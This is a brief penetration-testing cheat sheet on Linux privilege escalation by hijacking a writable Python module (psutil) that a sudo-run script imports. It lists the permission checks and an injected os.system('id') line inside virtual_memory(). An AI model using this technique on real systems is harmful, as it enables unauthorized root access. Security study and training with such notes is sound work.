Wrong write permission Abuse:

Wrong write permissions

Check permissions of a python script

ls -l file_name.py

Checking the content of file_name.py

Suppose that we found that this script imports the module psutil and uses the function virtual_memory().

Check writable permission over psutil module (PE)

grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/*

ls -l /usr/local/lib/python3.8/dist-packages/psutil/__init__.py

Module content hijacking (`…./psutil/init.py`)

Check if we get desirable results
Replace function with below code

def virtual_memory():
	...SNIP...
	#### Hijacking ####
	import os
	os.system('id')
	
	global _TOTAL_PHYMEM
	ret = _psplatform.virtual_memory()
	# cached for later use in Process.memory_percent()
	_TOTAL_PHYMEM = ret.total
	return ret

Run the script with sudo

sudo /usr/bin/python3 ./mem_status.py

Previouspython-library-hijacking Nextwindows

Last updated 1 day ago

hashtagCheck permissions of a python script

hashtagModule content hijacking (…./psutil/__init__.py)

hashtagRun the script with sudo

Check permissions of a python script

Module content hijacking (`…./psutil/init.py`)

Run the script with sudo